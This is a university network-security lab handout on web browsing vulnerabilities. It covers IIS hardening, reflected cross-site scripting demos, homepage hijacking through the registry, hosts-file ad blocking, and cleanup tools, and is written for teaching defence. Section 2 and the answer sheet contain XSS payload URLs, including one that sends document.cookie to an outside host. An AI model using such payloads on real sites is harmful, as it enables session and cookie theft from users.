Docstoc

browsing_sec

Document Sample
browsing_sec Powered By Docstoc
					                    ECE 4112: Internetwork Security
          Lab 12: Internet Browsing Vulnerabilities and Security


Group Number: ___________

Member Names: _______________            _______________

Please read the entire lab and any extra materials carefully before starting. Be sure to
start early enough so that you will have time to complete the lab. Answer ALL questions
and be sure you turn in ALL materials listed in the Turn-in Checklist ON or BEFORE
the Date Due.

Date:
Date Due:
Last Revised:

Written by: Beimnet Tadele, Andrew Larbi-Yeboa

NOTE: This document is an alteration of the document written by Ye Yan, Frank Park,
Scott Kim, and Neil Joshi.

Goal:       The goal of this lab is to examine common security vulnerability in browsing
the Internet and ways to decrease these vulnerabilities.

Summary:             The first order of business would be to install and configure Internet
Information Services (Windows web server) IIS. This will be used to run a few ASP
pages that have vulnerabilities. These vulnerabilities will be tested and patched.
Furthermore, you will be patching up and run various tools to make your browser from
various exploits.

Background and Theory: In today‟s world of the Internet, almost
every network is connected to the Internet. Furthermore, the most common activity on the
Internet is the browsing of pages. Therefore, securing one‟s browsing activity comes as a
pretty logical step. However, as this lab will show, security in browsing is not a one-side
process as other network securities. Both the serving side and the client should take
measures to ascertain that their exchange of information, whatever that would be, is
secure and unexploited.

Prelab Questions:                None.




                                             1
Lab Scenario:                For this lab, you are solely going to use your Win XP Pro
virtual machine. However, the lesson goes both to UNIX and Windows. We will install
IIS and run exploitable ASP pages. We will learn how the default configuration of
Internet Explorer makes us vulnerable to attacks through such pages. To avoid such
situation, we will configure IE 6.0 and learn good browsing habits. Finally, we will use
tools to clean spy wares, clean and fix browsing related registry problems, and write
scripts that run at startup and help clean cookies and temp folders.

Section 1: Installing and Securing IIS
For this lab, Windows XP and the native IIS was selected because of its ease for the
demonstration purposes used in this lab. IIS could be installed on any PC with Windows
XP Pro on it. Although many services, such as FTP and SMTP servers, come with IIS,
we are only going to install the web serving features. Once installed, we are going to
install and run Microsoft Baseline Security Analyzer 1.2.1 (MBSA) ,which will help us
identify security holes in our IIS installation.

Procure a CD from your TA and proceed with the following steps.

Click on “Start”--->”Contol Panel”--->”Add or remove programs”--->”Add/remove
windows components.” Put a check mark on Internet Information Services IIS. Click on
“Details” and uncheck SMTP and FTP. Click OK and NEXT. When prompted, put in the
WinXP Pro CD. When it finishes installing, click OK. You are now done installing IIS
and can use it as you wish. However, it is always a good habit to check for security
vulnerabilities in services you run. For this, copy MBSA installation file from NAS and
install it. Copy html files.zip from NAS and unzip it to C:\Inetpub\wwwroot.

Now run MBSA and see what security hazards IIS pose at present. Click on Scan a
computer. Then uncheck every option except for “Check for IIS vulnerabilities.” (Note:
this runs only the IIS scan). Submit a screen shot of the warnings you got. Once you
got the errors, correct the errors using the help guides listed. For files names, you can edit
file names and change them to your desire. Once you finish correcting the errors, run
MBSA again and get a screen shot of the clean scan (Note: you will need iislockd.exe to
complete this section – you can find this in NAS).

Section 2: Cross-site scripting and Java Scripting
The majority of web browsing related headaches have some kind of script as their origin.
Some sites have malicious scripts in their page that will infect you or exploit your system
when you view their page. Others have pages that have security holes that get exploits by
black hats to exploit your system. In this section, we are going to explore both kinds of
scripts and observe what we can do to avoid them.



                                              2
Browsers generally execute scripts that are sent to them from the server as encoded html
page. Usually, this scripts will be enclosed by <script></script> tag. Once this code gets
loaded into your browser, it gets executed as long as the security feature on the browser
allows it. As an example, type in

http://localhost/insidescript.html

2.1. What did you see, and what does that imply?

The next type of script exploiting is commonly referred to as Cross-site scripting or XSS
(sometimes it is referred to as CSS not to be confused with Cascading Style Sheets). This
scenario requires a hacker exploiting poor scripting writing to get access to personal
information from people accessing the script. Therefore, the script might be written and
used by a site that you trust and by a site that has good intentions. However, the poor
quality of the code writing will have both you and site owner exploited.

The most common situation arises when a page requests a variable from the URL and
sends it back as part of the HTML code to the client‟s browser. An example of this could
be a search page where you put in a keyword or some type of registration page where you
put in your personal information and your name or some other field gets displayed. Here
is an example of a URL supplying a page with the search keyword:

www.example.com/index.asp?keyword=find%20this

index.asp will then take the value of keyword and returns it as part of the page to the
user‟s browser. Now, to execute and java script of this desire, all a hacker would have to
do would be to replace the find%20 value of keyword to his java script. An example of an
altered link would be:

www.example.com/index.asp?keyword=<script>SCRIPTCODE</script>

When the script part returns to the client‟s browser, it gets executed and does what the
black hat intended it to do. Now, let us proceed and see how an XSS could be
accomplished. Obtain login.asp, temp.asp and index.asp from NAS and place them in
C:\intepub\wwwroot. Open each in sequence using notepad and use the comments to
observe what the code does.

2.2 Explain briefly what the pages do and how they are related?

Fill out the login page and observe what happens. Now, click on the following link and
see what happens:

http://localhost/index.asp?name=<script>alert(document.cookies);</script>

2.3 What was the result and what do you think it means?




                                             3
2.4 Consider the following link.
http://example.com/page.asp?variable=<script>document.location=’http://www.mys
ite.com/cgi-bin/mailer.cgi?’+docment.cookie</script>
What does this tell you in relation to cookie theft?

2.5 How you prevent this exploit
       a. From the client’s side?
       b. From the host’s side?
Hint: GET method on forms posts the information on the URL while POST method
send the information as a form member.

As we have seen some pages contain scripts and could run when you browse that
particular page. It could be a page you found through a search engine, a page referred by
a friend or you saw on an ad, however you saw it, when you end up there, you got a java
script running on your browser. This could hijack your browser, download a program
(possibly a virus or a spy ware) or send out information about you. To avoid such
unwelcome situations, you should always configure your browser to at least prompt you
when a script is about to be run in your browser.

Fire IE 6.0 and go to Tools--->Internet Options--->Security--->Local Intranet (Internet
for outside of the lab setting)--->Custom Level. Select prompt for every entry that has the
words ActiveX, script or Java in it. Click OK and then OK again. Once you are done with




           Figure 1. Security Settings for IE 6.0

this setting, re-click on the above link. You should get a prompt to let the script run. Click
NO. This prevents the script from running, and your cookie remains private.



                                              4
Probably, the other most security hazard concerning scripts is HTML based e-mails and
java scripts in e-mails. If you enable these features in your e-mail client, the above-
demonstrated alterations could happen to your computer. Furthermore, since any java
applet could be executed on your computer, sever damages could happen.

How to disable JavaScript in e-mail programs:

For Outlook:

   1. Go to “Tools”  “Options…” on the menu.
   2. Click the “Security” tab and select “Restricted sites” under the “Secure Content”
      area.
   3. Select “Zone Settings…”
   4. Select “Ok” when the warning GUI pops up.
   5. Select the “Custom Level…” button
   6. Under “Active Scripting” select “Disable”
   7. Select the “Ok” button

One of the classic examples of exploit that used java scripts was wire-tap. The above
steps will avoid such an exploit from running on your PC. Additionally network activity
will now take place in the “Restricted” zone.

Section 3: Browsing hijacking and anti-hijacking
Have you ever had a problem where your browser home page changed by itself? Have
you ever had a problem where you type in www.somesite.com, where „somesite’ is a site
of your choice, but you ended up on some shady or cheesy looking advertisement or
search page? Then you have experienced browser hijacking!! Yes, there are people out
there that literally abduct your browser. At the end, you don‟t have control of your own
browser. This obviously is very bad and could not be what you want out of Internet
surfing. So how is done and how could we prevent it?

The first thing we will do is see how home page changing occurs while visiting a site
without the proper precautions. Note: this method is one of many ways that attackers alter
your home page. Proper security as shown in the previous section and proper use of tools
explained in section 4 should always be enforced to minimize damage.

Almost every program you run on your computer, even though the majority of home
computer users have never heard of it, uses the registry in windows. The registry helps
programs to remember user settings and user privileges among many things. Altering this
information changes the way your programs behave.

For this exercise, you would need the homepageeditor.html from NAS. Copy this file into
C:\inetpub\wwwroot. Once you are done copying, open the default registry editor: Start --


                                            5
-> run ---> regedit. Navigate to “HKCU\Software\Microsoft\Internet Explorer\Main.”
Note the value of the “start page” key. Now close the editor and open the html file you
copied earlier in notepad. Observe the code. The next step would be to lower your
security setting in IE 6.0. Go to the security setting as before and re-set the default
setting. Once you have the default, enable everything for scripts and ActiveXs. Now fire
up IE 6.0 and type in http://localhost/homepageeditor.html. Once the page finishes
loading, open up regedit as before and observe the change to your home page. Did it
change?

3.1 What does this demonstrate? And how could you avoid this?

3.2 Could you explain how the source code of the above script be altered to change
the search page too?

The next type of hijacking is where your browser is taken for a “joy-ride” by its attackers
and where the surfer is flooded with ad pop-ups. Usually a spy ware infects your
computer and makes the browser load ads from the ad servers. Another way this works is
the page you are visiting allows the ad servers to load their ads to your browser. Both
ways, your browser has to ask for connection with the ad servers. When a connection to
any server is requested, what happens first is address look-up. Address look-up translates
the regular domain name that we know (eg. www.google.com) into an IP address that
machines understand. This address look-up starts from the host file in your computer. If a
computer finds the address translation inside its host file, it stops looking and contacts
that server. This host file, for XP machines, resides in
C:\WINDOWS\system32\drivers\etc folder. Copy the text file „fake_hosts.txt‟ from NAS
and open it. This shows you fake address translations for known ad servers. This way,
even though you have a spy ware, or even though your browser setting is alter somehow
and it keeps on calling these ad servers, you won‟t have pop ups from these ad servers.
Select the entire text, copy it and paste it at the last line in your host file. This will
prevent any ad from loading from these servers. The list is by no means complete,
however, a growing list could be found at: http://spyware.surferbeware.com, the original
supplier of this list.

Section 4: Cleaning and keeping it safe
In this section, we are going to look at some tools and habits we should follow to keep
our Internet surfing safe. We are going to see four methods: maintaining the registry,
using up to date anti-spy ware, cleaning your cookies, temp folders and cache, and
maintaining anonymity while surfing.

Section 4-1: Maintaining the registry

As we have seen in the previous section, the registry is like a backbone to your PC.
Furthermore, the health and integrity of the registry is necessary for the proper function



                                             6
of your programs. Malicious programs, such as spy wares, use the registry for persistent
existence in your system. They use the registry to get started on boot-up, to get recreated
on deletion and so on. This creates a major havoc for your system. To avoid such cases,
and other cases we have seen earlier, it is a good practice to clean your registry and delete
any unwanted or erroneous entries. For this, we are going to use a program named
CleanMyPC. The trial version of this tool is available at:
http://www.tomdownload.com/utilities/system_utilities/computer_registry_cleanup.htm.
Follow the following steps and install CleanMyPC.

   1. Copy the 15-day free trial CleanMyPC from the NAS server to your Tools folder.
   2. Double click and install the program
   3. Create a backup of your registry for precautionary measure.
   4. Click the “Startup Organizer”
   5. If there are any unidentifiable executables in the registry you will see them
   6.
Any malicious executables resident in your registry will be noticed and cleaned.

4.1 What kind of executable files did you see in the Startup Organizer?

Section 4-2: Cookies, temp folders and cache
Cookies are small text files that websites put on your PC (mostly with your permission)
to assist them identify you the next time you visit them. For example, when you sign in to
your popular e-mail account online (for example at yahoo.com), every page you visit on
yahoo remembers and displays your name by accessing the cookie left on your PC. Temp
folders are used to store temporary Internet files that help your browser speed up loading
pages and assist it in its other functions. Cache serves the same purpose. All these
features of browser help in some way or another to make your browsing activity smooth
and better. However, these features could be used to infect your computer (leaving spy
wares instead cookies) or could be used to get sensitive information. To avoid such
situations, you should always clean your cookies (those you don‟t need and don‟t know)
your temp folder and cache. The next steps show you how to do this.

First search for a folder named cookies and then temporary Internet files. You can use the
windows search feature. Once you find these folders, open them and delete everything in
them.

4.2 What is the path of these folders? Was everything deleted in both of them?

Now open IE 6.0. Got to Tools--->Internet Options. You can click “Delete Cookies...”
and “Delete Files...” These option clean out your cache.

Section 4-3: Beware of spy ware
One of the nauseating aspects of browsing is spy ware. Spy wares are programs that get
downloaded to your computer without your knowledge and send information about you


                                             7
and your browsing habits back to their creators. These usually get downloaded together
with some programs that you download off of the Internet. The other means they get
download is through Java scripts while browsing a website with unsafe browsers.
Nowadays, even with all the safety procedures followed, being infected with a spy ware
or two almost inevitable. Thus, it is generally a good practice to regularly scan your
computer with anti-spy ware software. For this, we suggest the Microsoft anti-spy ware
software (only the beta version is out during the writing of this document). This could be
downloaded at:

http://www.microsoft.com/athome/security/spyware/software/default.mspx


Section 4-4: Surfing the Internet anonymously

Every site you visit has the ability to collect personal information about you through your
unique IP address. Subsequently, they can also track your browsing activities and habits.
Knowledge of your IP address and operating system can allow hackers to penetrate your
system for malicious activities at the end.

A new tool set named Tor, has been developed for organizations to help improve safety
and secure browsing. This works making your Internet browsing anonymous. Tor is
could be downloaded from

http://tor.eff.org/download.html

The following four figures illustrate how Tor works. It was taken from the “master new
media” website:
http://www.masternewmedia.org/news/2005/04/15/anonymous_internet_browsing_can_i
ncrease.htm




                                             8
The website claims that “Tor uses a network of 'virtual tunnels' which allows individuals
to keep remote websites from tracking them. They can also use it to connect to resources
such as news sites or Instant Messaging services that are blocked by their local Internet
service providers (ISPs).”

In addition to Tor, there is a clientless way of doing the same thing. However, this would
require you to log on to a certain website. www.megaproxy.com provides free trial
services of such.

4.3 Why do you think your IP is going to look different for the websites you visit
while using Tor?


What corrections and or improvements do you suggest for this lab? Please be very
specific and if you add new material give the exact wording and instructions you
would give to future students in the new lab handout. You may cross out and edit
the text of the lab on previous pages to make corrections/suggestions. Note that part
of your lab grade is what improvements you make to this lab. You may want to
search the World Wide Web for other Buffer Overflow examples. What tools can we
add to this lab that teach something else new? You need to be very specific and
provide details. You need to actually do the suggested additions in the lab and
provide solutions to your suggested additions. Caution as usual: only extract and use
the tools you downloaded in the safe and approved environment of the network
security laboratory.




                                            9
           ECE 4112: Internetwork Security – Answer Sheet
         Lab 12: Internet Browsing Vulnerabilities and Security


Group Number: ___________

Member Names: _______________       _______________



Section 2: Cross-site scripting and Java Scripting
2.1. What did you see, and what does that imply?



2.2 Explain briefly what the pages do and how they are related?




2.3 What was the result and what do you think it means?




2.4 Consider the following link.
http://example.com/page.asp?variable=<script>document.location=’http://www.mys
ite.com/cgi-bin/mailer.cgi?’+docment.cookie</script>
What does this tell you in relation to cookie theft?

2.5 How you prevent this exploit
       c. From the client’s side?
       d. From the host’s side?
Hint: GET method on forms posts the information on the URL while POST method
sends the information as a form member.




                                        10
Section 3: Browsing hijacking and anti-hijacking
3.1 What does this demonstrate? And how could you avoid this?




3.2 Could you explain how the source code of the above script be altered to change
the search page too?




Section 4: Cleaning and keeping it safe
4.1 What kind of executable files did you see in the Startup Organizer?




4.2 What is the path of these folders? Was everything deleted in both of them?




4.3 Why do you think your IP is going to look different for the websites you visit
while using Tor?




                                          11
What corrections and or improvements do you suggest for this lab? Please be very
specific and if you add new material give the exact wording and instructions you
would give to future students in the new lab handout. You may cross out and edit
the text of the lab on previous pages to make corrections/suggestions. Note that part
of your lab grade is what improvements you make to this lab. You may want to
search the World Wide Web for other Buffer Overflow examples. What tools can we
add to this lab that teach something else new? You need to be very specific and
provide details. You need to actually do the suggested additions in the lab and
provide solutions to your suggested additions. Caution as usual: only extract and use
the tools you downloaded in the safe and approved environment of the network
security laboratory.




                                         12

				
DOCUMENT INFO